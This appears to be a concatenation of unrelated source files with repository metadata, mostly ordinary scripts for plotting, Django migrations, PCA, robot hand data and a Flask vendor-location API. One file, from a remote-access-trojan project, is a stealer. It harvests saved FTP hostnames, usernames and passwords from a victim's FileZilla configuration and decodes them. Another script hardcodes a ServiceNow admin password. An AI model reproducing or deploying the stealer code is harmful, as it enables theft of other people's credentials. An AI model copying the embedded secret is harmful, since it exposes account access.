3385d0740834d136b94244297d0e01af822e4328 | 622 | py | Python | Blatt1/src/script.py | lewis206/Computational_Physics | 06ad6126685eaf65f5834bfe70ebd91b33314395 | [
"MIT"
] | null | null | null | Blatt1/src/script.py | lewis206/Computational_Physics | 06ad6126685eaf65f5834bfe70ebd91b33314395 | [
"MIT"
] | null | null | null | Blatt1/src/script.py | lewis206/Computational_Physics | 06ad6126685eaf65f5834bfe70ebd91b33314395 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import matplotlib

# Set fontsize larger for latex plots
matplotlib.rcParams.update({'font.size': 20})

# Read data: columns are x/y samples; the *last* row carries the fitted
# line parameters (slope m, intercept n) rather than a data point, so it
# is stripped from the scatter plot below via [:-1].
x, y = np.genfromtxt("bin/python_Aufgabe2.txt", unpack=True)
m, n = x[-1], y[-1]

# Plotting
plt.figure(figsize=(12,7))
plt.grid()
plt.xlabel("x")
plt.ylabel("y")
# Extend the fitted line half a standard deviation beyond the data range.
x_new = np.linspace(min(x)-x[:-1].std()/2, max(x)+x[:-1].std()/2)
# NOTE(review): alpha=2 is outside the valid [0, 1] range; recent
# matplotlib versions reject it -- confirm the intended value.
plt.plot(x[:-1], y[:-1], "x", mew=2., alpha=2, label="Datenpunkte")
plt.plot(x_new, m*x_new+n, "-", linewidth=3, label="Ausgleichsgerade")
plt.legend()
plt.tight_layout()
plt.savefig("bin/figure.pdf", dpi=1200)
33868319c19ba1edc4a009ab8aec531548edc673 | 1,350 | py | Python | editregions/migrations/0001_initial.py | kezabelle/django-editregions | 961ddeffb37d30d40fb4e3e9224bc3f956b7a5b5 | [
"BSD-2-Clause-FreeBSD"
] | 1 | 2015-01-11T18:21:27.000Z | 2015-01-11T18:21:27.000Z | editregions/migrations/0001_initial.py | kezabelle/django-editregions | 961ddeffb37d30d40fb4e3e9224bc3f956b7a5b5 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | editregions/migrations/0001_initial.py | kezabelle/django-editregions | 961ddeffb37d30d40fb4e3e9224bc3f956b7a5b5 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import editregions.utils.regions
class Migration(migrations.Migration):
    """Initial schema: creates the ``EditRegionChunk`` content-block table.

    Auto-generated by Django's makemigrations; avoid hand-editing the
    operations below.
    """

    dependencies = [
        # Required for the ForeignKey to contenttypes.ContentType below.
        ('contenttypes', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='EditRegionChunk',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('modified', models.DateTimeField(auto_now=True)),
                ('content_id', models.CharField(max_length=255, db_index=True)),
                ('region', models.CharField(max_length=75, validators=[editregions.utils.regions.validate_region_name])),
                ('position', models.PositiveIntegerField(default=None, db_index=True)),
                ('content_type', models.ForeignKey(related_name='+', to='contenttypes.ContentType')),
            ],
            options={
                'ordering': ['position'],
                'abstract': False,
                'db_table': 'editregions_editregionchunk',
                'verbose_name': 'content block',
                'verbose_name_plural': 'content blocks',
            },
            bases=(models.Model,),
        ),
    ]
| 37.5 | 121 | 0.586667 | 1,208 | 0.894815 | 0 | 0 | 0 | 0 | 0 | 0 | 303 | 0.224444 |
3386cfd4a875f26af378b42735047ac756a1b6cf | 887 | py | Python | histVarPng.py | AineNicD/pands-project | 55f7dbab4f106f4776be4e0248c941a4246e64ac | [
"MIT"
] | null | null | null | histVarPng.py | AineNicD/pands-project | 55f7dbab4f106f4776be4e0248c941a4246e64ac | [
"MIT"
] | null | null | null | histVarPng.py | AineNicD/pands-project | 55f7dbab4f106f4776be4e0248c941a4246e64ac | [
"MIT"
] | null | null | null | #Saves a historgram of each variable to png files
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns

# read data
data = pd.read_csv("irisDataSet.csv")

# names of variables (kept for reference)
names = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'species']

# separating by species
setosa = data[data['species']=='setosa']
versicolor = data[data['species']=='versicolor']
virginica = data[data['species']=='virginica']

# DataFrame.hist() draws into a new figure and leaves it "current", while
# plt.savefig() always saves the *current* figure.  The original drew all
# three figures first and then called savefig three times, which wrote the
# virginica histograms into all three png files.  Save each figure right
# after drawing it instead.
setosa.hist()
plt.savefig("setosa.png")
versicolor.hist()
plt.savefig("versicolor.png")
virginica.hist()
plt.savefig("virginica.png")
plt.show()

# Ian Mc Loughlin lecture on plots
# data frame code for each species from https://www.kaggle.com/abhishekkrg/python-iris-data-visualization-and-explanation
| 22.74359 | 121 | 0.723788 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 524 | 0.590755 |
3387d6dfab24bbf352088172ca1497dc6db9c9b1 | 712 | py | Python | build.py | LagoLunatic/GCFT | d838614804058c7b7ea5c62b37251a2795f5c791 | [
"MIT"
] | 38 | 2020-01-14T01:20:15.000Z | 2022-02-15T00:03:33.000Z | build.py | LagoLunatic/GCFT | d838614804058c7b7ea5c62b37251a2795f5c791 | [
"MIT"
] | 7 | 2020-01-13T18:08:07.000Z | 2022-01-13T02:20:30.000Z | build.py | LagoLunatic/GCFT | d838614804058c7b7ea5c62b37251a2795f5c791 | [
"MIT"
] | 1 | 2021-09-23T19:30:55.000Z | 2021-09-23T19:30:55.000Z |
# Package the built GCFT executable and README into a release zip.
from zipfile import ZipFile
import os

from version import VERSION

base_name = "GameCube File Tools"
base_name_with_version = base_name + " " + VERSION

# Pointer width distinguishes a 32-bit from a 64-bit Python build.
import struct
pointer_bits = struct.calcsize("P") * 8
base_name_with_version += "_64bit" if pointer_bits == 64 else "_32bit"
base_zip_name = base_name_with_version

zip_name = base_zip_name.replace(" ", "_") + ".zip"

exe_path = "./dist/%s.exe" % base_name_with_version
if not os.path.isfile(exe_path):
  raise Exception("Executable not found: %s" % exe_path)

with ZipFile("./dist/" + zip_name, "w") as zip:
  zip.write(exe_path, arcname="%s.exe" % base_name)
  zip.write("README.md", arcname="README.txt")
| 26.37037 | 56 | 0.723315 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 139 | 0.195225 |
338824f1551a38d9cfd8d8f7b8e6193c7a8c97ff | 2,894 | py | Python | Settings/RobotData.py | xzhang-wr/DAnTE_V2 | 8b433973aa5ab47ef237d8dfaca6232a6d9f526b | [
"Apache-2.0"
] | null | null | null | Settings/RobotData.py | xzhang-wr/DAnTE_V2 | 8b433973aa5ab47ef237d8dfaca6232a6d9f526b | [
"Apache-2.0"
] | null | null | null | Settings/RobotData.py | xzhang-wr/DAnTE_V2 | 8b433973aa5ab47ef237d8dfaca6232a6d9f526b | [
"Apache-2.0"
] | null | null | null | #!usr/bin/env python
__author__ = "X Zhang"
__email__ = "xzhang@westwoodrobotics.net"
__copyright__ = "Copyright 2020 Westwood Robotics Corp."
__date__ = "Feb 14, 2020"
__version__ = "0.1.0"
__status__ = "Beta"
from Settings.Constants_DAnTE import *
import math
import numpy as np
class FingerDataStructure(object):
    """Per-finger state: motor mapping, calibration values and pose data."""

    def __init__(self, name, motor_id, mirrored, encoder=None):
        # Identity / hardware mapping.
        self.name = name
        self.motor_id = motor_id
        # True when the finger's drive mechanism is mirrored from the thumb.
        self.mirrored = mirrored
        # Encoder pin number on the Pi (None when the finger has no encoder).
        self.encoder = encoder

        # Calibration values, filled in during initialization.
        self.homing_offset = 0    # BEAR offset so that fully open reads 0
        self.travel = 0           # total BEAR travel from open to closed
        self.encoder_offset = -1  # encoder reading when fully open
        self.initialized = False  # finger has been initialized

        # Runtime state.
        self.contact = False                     # object-contact status
        self.angles = [0, 0, 0, 0]               # phalanx angles [alpha, beta, gamma, delta]
        self.joint_locations = np.zeros([4, 3])  # 3D rows: MCP, PIP, DIP, Tip
class PalmDataStructure(object):
    """Palm state: Dynamixel motor mapping, calibration and gesture."""

    def __init__(self, name, motor_id):
        self.name = name
        self.motor_id = motor_id
        self.homing_offset = 0    # Dynamixel homing offset, if any
        # 90 degrees of travel turns the INDEX fingers from parallel to pinch.
        self.travel = math.pi / 2
        self.home = 0             # Dynamixel position for parallel index fingers
        self.initialized = False  # palm has been initialized
        self.gesture = None       # current hand-gesture status
        self.angle = 0            # current palm angle (theta)
        # Sensors to be added.
class RobotDataStructure(object):
    """Whole-hand state: bus configuration plus palm and finger structures."""

    def __init__(self, name, BEAR_port, BEAR_baudrate, DXL_port, DXL_baudrate, palm=None, fingerlist=None):
        # Bus / communication settings.
        self.name = name
        self.BEAR_baudrate = BEAR_baudrate
        self.BEAR_port = BEAR_port
        self.DXL_baudrate = DXL_baudrate
        self.DXL_port = DXL_port

        # Default to a standard palm and a lone thumb when not specified.
        if palm is None:
            palm = PalmDataStructure("PALM", DXL_PALM)
        if fingerlist is None:
            fingerlist = [FingerDataStructure("THUMB", BEAR_THUMB, False)]
        self.palm = palm
        self.fingerlist = fingerlist
        self.finger_count = len(fingerlist)

        # Parallel lists of motor ids and encoder pins, one entry per finger.
        self.finger_ids = [f.motor_id for f in fingerlist]
        self.encoders = [f.encoder for f in fingerlist]

        # Runtime status flags.
        self.initialized = False  # full hand has been initialized
        self.contact = False      # object-contact status
        self.booted = False       # system has booted
3388f9df9b80255086f1204a7c8b7e0f3646bb15 | 2,012 | py | Python | src/main/resources/servicenow/OpenTicket.py | xdanw/xld-servicenow-incidentlog | 9ae4ccf5a110dab0294aa38cd04b2abc8615acba | [
"MIT"
] | null | null | null | src/main/resources/servicenow/OpenTicket.py | xdanw/xld-servicenow-incidentlog | 9ae4ccf5a110dab0294aa38cd04b2abc8615acba | [
"MIT"
] | null | null | null | src/main/resources/servicenow/OpenTicket.py | xdanw/xld-servicenow-incidentlog | 9ae4ccf5a110dab0294aa38cd04b2abc8615acba | [
"MIT"
] | null | null | null |
import json
import requests
import requests.utils
# Fixes some issues with TLS
import os
os.environ['REQUESTS_CA_BUNDLE'] = 'ca.pem';
# --- Debug Purposes Only, Server Config Is Hard Coded ---
#
#
# print "Debug ... " + deployed.ResultUri;
# response = requests.get('https://webhook.site/062e2ea7-5a36-4abb-a2c8-862dd85f777f')
# print response.status_code;
task = context.getTask()
# Debug
# print "Task info?"
# print str(task.getId());
# print str(task.getUsername());
# print str(task.getMetadata());
msg = "Message: " + str(task.getMetadata()['application']) + \
" (ver: " + str(task.getMetadata()['version']) + ") " + \
"is being deployed to: " + str(task.getMetadata()['environment']) + \
" by user: " + str(task.getUsername());
print msg;
# --- ServiceNow API ---
# per https://docs.servicenow.com/bundle/london-application-development/page/integrate/inbound-rest/concept/c_TableAPI.html
# Set the request parameters
url = 'https://dev58646.service-now.com/api/now/table/incident'
# Eg. User name="admin", Password="admin" for this code sample.
user = 'admin'
pwd = 'dgZyGsSI6L7z'
# Set proper headers
headers = {"Content-Type":"application/json","Accept":"application/json"}
# Do the HTTP request
data = "{'short_description':'" + msg +"','urgency':'5','impact':'5'}"
response = requests.post(url, auth=(user, pwd), headers=headers ,data=data)
# Check for HTTP codes other than 200 and 201
if response.status_code != 200 and response.status_code != 201:
print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.json())
raise exception;
# Decode the JSON response into a dictionary and use the data
data = response.json()
# print(data)
# responseData = json.loads(data)
# print str(responseData.get('result').get('sys_id')); # Get sys_id
# --- End API ---
context.setAttribute('ticket_sys_id', str(data['result']['sys_id']))
print 'Storing attribute... sys_id: ' + context.getAttribute('ticket_sys_id');
print "Ticket opened.";
| 30.484848 | 123 | 0.695328 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,321 | 0.656561 |
338945537366a67604118a7d7b4f22b6a5da388b | 4,318 | py | Python | code/joint_pca.py | craig-willis/SOMOSPIE | 0e2b43bd047252d992bc533285a3469ea5d60e09 | [
"BSD-3-Clause"
] | null | null | null | code/joint_pca.py | craig-willis/SOMOSPIE | 0e2b43bd047252d992bc533285a3469ea5d60e09 | [
"BSD-3-Clause"
] | null | null | null | code/joint_pca.py | craig-willis/SOMOSPIE | 0e2b43bd047252d992bc533285a3469ea5d60e09 | [
"BSD-3-Clause"
] | 3 | 2020-02-14T14:31:50.000Z | 2022-01-04T16:51:40.000Z | #!/usr/bin/env python3
# This script assumes that the non-numerical column headers
# in train and predi files are identical.
# Thus the sm header(s) in the train file must be numeric (day/month/year).
import sys
import numpy as np
import pandas as pd
from sklearn.decomposition import PCA #TruncatedSVD as SVD
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
def mask(df, f):
    """Return the rows of ``df`` selected by the boolean predicate ``f``."""
    selector = f(df)
    return df[selector]
def is_int(val):
    """Return True when ``val`` can be converted with ``int()``."""
    try:
        int(val)
        return True
    except (TypeError, ValueError):
        # Only conversion failures mean "not an int"; the original bare
        # ``except`` also swallowed unrelated errors such as
        # KeyboardInterrupt and SystemExit.
        return False
def remove_sparse_rows(data, error=-99999.0):
    """Return ``data`` without the rows that contain the ``error`` sentinel.

    Args:
        data: DataFrame to filter.
        error: sentinel value marking missing/invalid cells.

    Returns:
        A new DataFrame (positional index) holding only the complete rows.
    """
    # Two fixes versus the original:
    #  * ``.as_matrix()`` was removed in pandas 1.0; ``.values`` is the
    #    equivalent accessor.
    #  * the filter kept rows *containing* the error value -- the opposite
    #    of what the function name promises; keep rows *without* it.
    rows = [row for row in data.values if error not in row]
    return pd.DataFrame(rows, columns=data.columns)
def fit_data(train_data, num_comps="mle"):
    """Fit a standardize-then-PCA pipeline on ``train_data`` and return it.

    Args:
        train_data: samples-by-features table of covariates.
        num_comps: number of PCA components, or "mle" to let PCA choose.
    """
    # svd_solver="full" is required when num_comps="mle"
    # (https://github.com/scikit-learn/scikit-learn/issues/9884).
    pipeline = Pipeline([
        ("scaler", StandardScaler()),
        ("pca", PCA(n_components=num_comps, svd_solver="full")),
    ])
    pipeline.fit(train_data)
    return pipeline
# Select the target number of components using the Average Eigenvalue
# technique (http://pubs.acs.org/doi/pdf/10.1021/ie990110i): keep every
# component whose eigenvalue is at least ``bound``.
def choose_num_comps(train_data, bound=1):
    """Return how many principal components of ``train_data`` have an
    eigenvalue of at least ``bound``."""
    model = fit_data(train_data)
    eigenvals = model.named_steps['pca'].explained_variance_
    return sum(1 for ev in eigenvals if ev >= bound)
# Assumes the first two columns are x/y-coordinates
# and integer-headed columns are sm data, not covariates.
def get_params(data):
    """Return covariate column names: the non-integer headers after the two
    leading coordinate columns."""
    return [col for col in list(data.columns)[2:] if not is_int(col)]
# Apply to {df} the pca transformation {model} that maps {params}-headed
# data to {num_comps} new columns.
def apply_model(df, model, params, num_comps):
    """Replace the ``params`` columns of ``df`` with ``num_comps`` component
    columns produced by ``model.transform``."""
    transformed = model.transform(df[params])
    component_cols = [f"Component{i}" for i in range(num_comps)]
    components = pd.DataFrame(transformed, columns=component_cols)

    remainder = df.drop(params, axis=1)
    # Reset both indices so concat aligns rows positionally, not by label.
    components.reset_index(drop=True, inplace=True)
    remainder.reset_index(drop=True, inplace=True)
    return pd.concat([remainder, components], axis=1)
def joint_pca(train_data, predi_data, params):
    """Fit PCA on the training covariates and apply it to both datasets.

    The same scaler+PCA model must transform the train and prediction
    frames so their resulting component columns are comparable.

    Args:
        train_data: DataFrame with coordinates, sm columns and covariates.
        predi_data: DataFrame with coordinates and the same covariates.
        params: covariate column names shared by both frames.

    Returns:
        Tuple ``(train_data, predi_data, components)``: both frames with
        the ``params`` columns replaced by component columns, plus the PCA
        component (loadings) matrix.
    """
    # Run PCA on train_data to create a dimension-reduction model.
    pca_train = train_data[params]
    num_comps = choose_num_comps(pca_train)
    model = fit_data(pca_train, num_comps)
    # Apply the same model to both train and predi data.
    train_data = apply_model(train_data, model, params, num_comps)
    predi_data = apply_model(predi_data, model, params, num_comps)
    components = model.named_steps["pca"].components_
    return train_data, predi_data, components
if __name__ == "__main__":
train_in = sys.argv[1]
predi_in = sys.argv[2]
train_out = sys.argv[3]
predi_out = sys.argv[4]
log_file = sys.argv[5]
# Read in data files.
train_data = pd.read_csv(train_in, header=0)
predi_data = pd.read_csv(predi_in, header=0)
# Find param names.
params = get_params(train_data)
# Do that pca stuff.
train_pca, predi_pca, components = joint_pca(train_data, predi_data, params)
# Write the results to specified files.
train_pca.to_csv(path_or_buf=train_out, index=False)
predi_pca.to_csv(path_or_buf=predi_out, index=False)
# Log the pca components.
with open(log_file, "a") as log:
log.write("Component Eigenvalues:\n")
for i in range(len(params)):
log.write(f"{params[i]}:\n{[c[i] for c in components]}\n")
| 33.472868 | 113 | 0.700787 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,697 | 0.393006 |
338af8622848bff11a1275eae70f3a73f237b0cc | 439 | py | Python | algoanim/stats.py | Gaming32/Python-AlgoAnim | c6df06e263f52d57ca91471830ff8fa14f1d85db | [
"MIT"
] | null | null | null | algoanim/stats.py | Gaming32/Python-AlgoAnim | c6df06e263f52d57ca91471830ff8fa14f1d85db | [
"MIT"
] | null | null | null | algoanim/stats.py | Gaming32/Python-AlgoAnim | c6df06e263f52d57ca91471830ff8fa14f1d85db | [
"MIT"
class Stats:
    """Running counters of read/write/access operations."""

    writes: int    # total writes recorded
    reads: int     # total reads recorded
    accesses: int  # reads + writes combined

    def __init__(self) -> None:
        """Start with every counter at zero."""
        self.reset()

    def reset(self) -> None:
        """Zero all counters."""
        self.writes = self.reads = self.accesses = 0

    def add_reads(self, count: int = 1) -> None:
        """Record ``count`` reads (and the matching accesses)."""
        self.reads += count
        self.accesses += count

    def add_writes(self, count: int = 1) -> None:
        """Record ``count`` writes (and the matching accesses)."""
        self.writes += count
        self.accesses += count
338b6987963d5d47f633929d5f959e0cea5cc7d2 | 120 | py | Python | models/__init__.py | MartinPernus/MaskFaceGAN | e10b7c5b2f74113118b89913089a7529d709dce1 | [
"MIT"
] | 11 | 2021-07-28T12:52:26.000Z | 2022-02-28T02:53:23.000Z | models/__init__.py | MartinPernus/MaskFaceGAN | e10b7c5b2f74113118b89913089a7529d709dce1 | [
"MIT"
] | 2 | 2021-11-01T09:36:48.000Z | 2021-12-13T12:32:09.000Z | models/__init__.py | MartinPernus/MaskFaceGAN | e10b7c5b2f74113118b89913089a7529d709dce1 | [
"MIT"
] | 1 | 2021-11-01T09:36:55.000Z | 2021-11-01T09:36:55.000Z | from .attribute_classifier import BranchedTinyAttr
from .face_parser import FaceParser
from .stylegan2 import Generator
| 30 | 50 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
338b7280d85cf38ca0b11c2d5921f28082cfcfc1 | 2,787 | py | Python | tests/utils_tests.py | djt5019/queries | 6bae5fa9a0cb397a43a41dd6692a81b9fb389096 | [
"BSD-3-Clause"
] | null | null | null | tests/utils_tests.py | djt5019/queries | 6bae5fa9a0cb397a43a41dd6692a81b9fb389096 | [
"BSD-3-Clause"
] | null | null | null | tests/utils_tests.py | djt5019/queries | 6bae5fa9a0cb397a43a41dd6692a81b9fb389096 | [
"BSD-3-Clause"
] | null | null | null | """
Tests for functionality in the utils module
"""
import mock
try:
import unittest2 as unittest
except ImportError:
import unittest
from queries import utils
class GetCurrentUserTests(unittest.TestCase):
    """Tests for queries.utils.get_current_user."""

    def test_get_current_user(self):
        """get_current_user returns value from pwd.getpwuid"""
        with mock.patch('pwd.getpwuid') as getpwuid:
            getpwuid.return_value = ['mocky']
            self.assertEqual(utils.get_current_user(), 'mocky')
class URLParseTestCase(unittest.TestCase):
    """Exercise queries.utils.urlparse against a representative URI."""

    URI = 'pgsql://foo:bar@baz:5444/qux'

    def _parsed(self):
        # Re-parse per assertion so every test stands alone.
        return utils.urlparse(self.URI)

    def test_urlparse_hostname(self):
        """hostname should match expectation"""
        self.assertEqual(self._parsed().hostname, 'baz')

    def test_urlparse_port(self):
        """port should match expectation"""
        self.assertEqual(self._parsed().port, 5444)

    def test_urlparse_path(self):
        """path should match expectation"""
        self.assertEqual(self._parsed().path, '/qux')

    def test_urlparse_username(self):
        """username should match expectation"""
        self.assertEqual(self._parsed().username, 'foo')

    def test_urlparse_password(self):
        """password should match expectation"""
        self.assertEqual(self._parsed().password, 'bar')
class URIToKWargsTestCase(unittest.TestCase):
    """Exercise queries.utils.uri_to_kwargs, including query-string handling."""

    URI = ('pgsql://foo:bar@baz:5444/qux?options=foo&options=bar&keepalives=1&'
           'invalid=true')

    def test_uri_to_kwargs_host(self):
        """hostname should match expectation"""
        self.assertEqual(utils.uri_to_kwargs(self.URI)['host'], 'baz')

    def test_uri_to_kwargs_port(self):
        """port should match expectation"""
        self.assertEqual(utils.uri_to_kwargs(self.URI)['port'], 5444)

    def test_uri_to_kwargs_dbname(self):
        """dbname should match expectation"""
        self.assertEqual(utils.uri_to_kwargs(self.URI)['dbname'], 'qux')

    def test_uri_to_kwargs_username(self):
        """user should match expectation"""
        self.assertEqual(utils.uri_to_kwargs(self.URI)['user'], 'foo')

    def test_uri_to_kwargs_password(self):
        """password should match expectation"""
        self.assertEqual(utils.uri_to_kwargs(self.URI)['password'], 'bar')

    def test_uri_to_kwargs_options(self):
        """options should match expectation"""
        self.assertEqual(utils.uri_to_kwargs(self.URI)['options'],
                         ['foo', 'bar'])

    def test_uri_to_kwargs_keepalive(self):
        """keepalive should match expectation"""
        self.assertEqual(utils.uri_to_kwargs(self.URI)['keepalives'], 1)

    def test_uri_to_kwargs_invalid(self):
        """invalid query argument should not be in kwargs"""
        # Fixed: the assertion previously checked for the misspelled key
        # 'invaid', which is never present, making the test vacuous.
        self.assertNotIn('invalid', utils.uri_to_kwargs(self.URI))
| 32.788235 | 79 | 0.679584 | 2,608 | 0.935773 | 0 | 0 | 239 | 0.085755 | 0 | 0 | 864 | 0.310011 |
338bdb61b810291631438e77fffbc7457c38058b | 1,421 | py | Python | Core/Stealer/FileZilla.py | HugoMskn/Telegram-RAT | 53989b2509b1c844c6a33f670aece5f8dbf15305 | [
"MIT"
] | 375 | 2020-03-17T06:20:50.000Z | 2022-03-29T22:27:23.000Z | Core/Stealer/FileZilla.py | HugoMskn/Telegram-RAT | 53989b2509b1c844c6a33f670aece5f8dbf15305 | [
"MIT"
] | 44 | 2020-04-06T22:37:59.000Z | 2020-11-15T15:53:39.000Z | Core/Stealer/FileZilla.py | HugoMskn/Telegram-RAT | 53989b2509b1c844c6a33f670aece5f8dbf15305 | [
"MIT"
] | 173 | 2020-04-01T17:17:26.000Z | 2022-03-24T13:28:15.000Z | # Import modules
import os
from xml.dom import minidom
from base64 import b64decode
# Fetch servers from FileZilla
FileZilla = os.getenv('AppData') + '\\FileZilla\\'
def StealFileZilla():
if not os.path.exists(FileZilla):
return []
RecentServersPath = FileZilla + 'recentservers.xml'
SiteManagerPath = FileZilla + 'sitemanager.xml'
# Read recent servers
if os.path.exists(RecentServersPath):
xmlDoc = minidom.parse(RecentServersPath)
Servers = xmlDoc.getElementsByTagName('Server')
for Node in Servers:
Server = {
'Hostname': 'ftp://' + Node.getElementsByTagName('Host')[0].firstChild.data + ':' + Node.getElementsByTagName('Port')[0].firstChild.data + '/',
'Username': Node.getElementsByTagName('User')[0].firstChild.data,
'Password': base64.b64decode(Node.getElementsByTagName('Pass')[0].firstChild.data).decode()
}
# Read sitemanager
if os.path.exists(SiteManagerPath):
xmlDoc = minidom.parse(SiteManagerPath)
Servers = xmlDoc.getElementsByTagName('Server')
for Node in Servers:
Server = {
'Hostname': 'ftp://' + Node.getElementsByTagName('Host')[0].firstChild.data + ':' + Node.getElementsByTagName('Port')[0].firstChild.data + '/',
'Username': Node.getElementsByTagName('User')[0].firstChild.data,
'Password': base64.b64decode(Node.getElementsByTagName('Pass')[0].firstChild.data).decode()
}
return Server | 33.046512 | 148 | 0.696692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 301 | 0.211823 |
338c3eed58a47fa30a2aa03ae3da78bb3efa67b1 | 535 | py | Python | oldcontrib/tools/gallery/urls.py | servee/django-servee-oldcontrib | 836447ebbd53db0b53879a35468c02e57f65105f | [
"BSD-Source-Code"
] | null | null | null | oldcontrib/tools/gallery/urls.py | servee/django-servee-oldcontrib | 836447ebbd53db0b53879a35468c02e57f65105f | [
"BSD-Source-Code"
] | null | null | null | oldcontrib/tools/gallery/urls.py | servee/django-servee-oldcontrib | 836447ebbd53db0b53879a35468c02e57f65105f | [
"BSD-Source-Code"
] | null | null | null | from django.conf.urls.defaults import *
# AJAX endpoints for gallery management, resolved against views in
# oldcontrib.tools.gallery.views (old-style Django `patterns()` API).
urlpatterns = patterns('oldcontrib.tools.gallery.views',
    url(r'^add_to_gallery/$', view='add_to_gallery', name='add_to_gallery'),
    url(r'^remove_from_gallery/$', view='remove_from_gallery', name='remove_from_gallery'),
    url(r'^create_gallery/$', view='create_gallery', name='create_gallery'),
    url(r'^update_gallery_order/$', view='update_gallery_order', name='update_gallery_order'),
    url(r'^change_gallery_title/$', view='change_gallery_title', name='change_gallery_title'),
) | 59.444444 | 94 | 0.745794 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 343 | 0.641121 |
338c9be69572a77ed6dc3ba19bdccb2d83d6f3ff | 4,333 | py | Python | server/app/mod_api/endpoints.py | meyersj/TamaleNow | 59003d2122ce6af4928a8b16a0fe0ab547df66b9 | [
"MIT"
] | null | null | null | server/app/mod_api/endpoints.py | meyersj/TamaleNow | 59003d2122ce6af4928a8b16a0fe0ab547df66b9 | [
"MIT"
] | 1 | 2015-08-28T01:59:24.000Z | 2015-08-28T01:59:24.000Z | server/app/mod_api/endpoints.py | meyersj/TamaleNow | 59003d2122ce6af4928a8b16a0fe0ab547df66b9 | [
"MIT"
] | null | null | null | # Copyright (C) 2015 Jeffrey Meyers
#
# This program is released under the "MIT License".
# Please see the file COPYING in this distribution for
# license terms.
import datetime
from flask import Blueprint, request, jsonify
from webargs import Arg
from webargs.flaskparser import use_args
import geoalchemy2.functions as func
from app import app, db
from app.models import Active, Locations
mod_api = Blueprint('api', __name__, url_prefix='/api')
@mod_api.errorhandler(422)
def handle_bad_request(err):
    """Return a JSON error payload for unprocessable (422) requests."""
    # Fixed: getattr without a default raised AttributeError when webargs
    # did not attach a `data` attribute to the error.
    data = getattr(err, 'data', None)
    if data:
        message = data['message']
    else:
        message = 'Invalid request'
    return jsonify({'error': message}), 422
@mod_api.route('/')
def index():
    """Landing route confirming the API blueprint is mounted."""
    return "api module"
# webargs schema for POST /active: the vendor id and its new active flag.
active_post_args = {
    'vendor_id':Arg(str, required=True),
    'active':Arg(str, required=True)
}
@mod_api.route("/active", methods=["POST"])
@use_args(active_post_args)
def active_post(args):
    """Insert a new Active status record for a vendor and echo the result."""
    response = dict(**args)
    response["success"] = True
    try:
        record = Active(**args)
        db.session.add(record)
        db.session.commit()
    except Exception as e:
        response["success"] = False
        # Fixed NameError: this was `resonse["exception"]`, which crashed
        # the error path instead of reporting the failure to the caller.
        response["exception"] = str(e)
    return jsonify(response)
def query_vendor_status(vendor_id):
    """Return the most recent Active record for ``vendor_id``, or None."""
    recent_first = Active.query.filter_by(vendor_id=vendor_id).order_by(
        Active.tstamp.desc())
    return recent_first.first()
# webargs schema for GET /active: look up status by vendor id.
active_get_args = {
    'vendor_id':Arg(str, required=True)
}
@mod_api.route('/active', methods=['GET'])
@use_args(active_get_args)
def active_get(args):
    """Report the most recently recorded active flag for a vendor."""
    response = dict(**args)
    status = query_vendor_status(args["vendor_id"])
    if status is None:
        # No record was ever stored for this vendor id.
        response["success"] = False
        response["msg"] = "no matching vendor_id"
    else:
        response["success"] = True
        response["active"] = status.active
    return jsonify(response)
# webargs schema for POST /location: vendor id plus coordinates.
# Fixed: `required` was misspelled `requred` for lat/lon, so those two
# fields were silently treated as optional instead of mandatory.
location_post_args = {
    'vendor_id':Arg(str, required=True),
    'lat':Arg(str, required=True),
    'lon':Arg(str, required=True)
}
@mod_api.route("/location", methods=["POST"])
@use_args(location_post_args)
def location_post(args):
    """Record a location update for a vendor, only while it is active."""
    status = query_vendor_status(args["vendor_id"])
    response = dict(vendor_id=args["vendor_id"], success=False)
    if not status:
        response["msg"] = "vendor does not exist"
    elif not status.active:
        # Redundant `status and` removed: this branch already implies it.
        response["msg"] = "vendor is not currently active"
    else:
        try:
            location = Locations(**args)
            db.session.add(location)
            db.session.commit()
            response["success"] = True
            response["msg"] = "location updated"
        except Exception as e:
            # Surface the database error to the caller instead of a 500.
            response["exception"] = str(e)
    # Note: the original called `.format(args["vendor_id"])` on messages with
    # no placeholder — a no-op; removed without changing any output.
    return jsonify(response)
def query_vendor_location(vendor_id):
    """Return the newest (vendor_id, tstamp, lon, lat) row for a vendor, or None."""
    columns = (
        Locations.vendor_id,
        Locations.tstamp,
        func.ST_X(Locations.geom).label("lon"),
        func.ST_Y(Locations.geom).label("lat"),
    )
    newest_first = db.session.query(*columns).filter_by(
        vendor_id=vendor_id).order_by(Locations.tstamp.desc())
    return newest_first.first()
# webargs schema for GET /location: look up coordinates by vendor id.
location_get_args = {
    'vendor_id':Arg(str, required=True)
}
@mod_api.route('/location', methods=['GET'])
@use_args(location_get_args)
def location_get(args):
    """Return the latest known coordinates for an active vendor."""
    # Fixed: the decorator previously reused `active_get_args`; this route
    # now uses its own (identical) `location_get_args` schema as intended.
    status = query_vendor_status(args["vendor_id"])
    response = dict(vendor_id=args["vendor_id"], success=False)
    # vendor does not exist
    if not status:
        response["msg"] = "vendor does not exist"
    # vendor is not active
    elif not status.active:
        response["msg"] = "vendor is not currently active"
    # vendor is active so look up most recent coordinates
    else:
        location = query_vendor_location(args["vendor_id"])
        if location:
            response = dict(
                success=True,
                vendor_id=location.vendor_id,
                tstamp=str(location.tstamp),
                lat=location.lat,
                lon=location.lon
            )
        else:
            response["msg"] = "retrieving coordinates failed"
